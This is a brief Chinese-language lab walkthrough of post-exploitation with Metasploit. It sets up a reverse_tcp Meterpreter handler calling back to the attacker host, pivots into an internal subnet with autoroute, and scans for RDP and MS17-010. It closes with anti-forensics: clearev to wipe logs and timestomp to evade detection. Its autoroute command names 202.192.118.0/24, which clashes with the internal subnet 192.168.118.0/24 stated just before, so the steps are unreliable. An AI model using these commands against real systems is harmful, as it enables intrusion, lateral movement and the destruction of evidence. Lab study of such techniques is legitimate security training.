实验机:
MSF攻击机:202.192.29.17
跳板机:202.192.29.45
内网目标机:192.168.118.129
这里从我们已经拿下了跳板机开始,我们直接使用msfvenom传给跳板机点击,生成一个session:
设置好msf配置信息:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 202.192.29.17
set LPORT 4444
run
获取到shell后如果出现乱码,使用chcp命令:
1.route
查询内网本地路由查询,得到内网网段地址为:192.168.118.0/24
接下来我们需要添加去往目标内网网段(192.168.118.0/24)的静态路由,使用run autoroute -s 202.192.118.0/24
添加,使用run autoroute -p
查看是否添加成功:
设置好路由之后,我们就可以对内网进行扫描了,做一个简单的测试,扫描内网的3389端口:
我们试着内网主机进行扫描,查看是否存在ms17_010漏洞:
发现192.168.118.129这台机子有可能存在漏洞,接着便可以实施进一步攻击
1.clearev
在渗透入侵的过程中难免会留下一下日志信息痕迹,我们可以使用此命令来擦除留下的痕迹:
2.timestomp
将时间统一,减少被发现的概率
3.systeminfo
查看是否少了补丁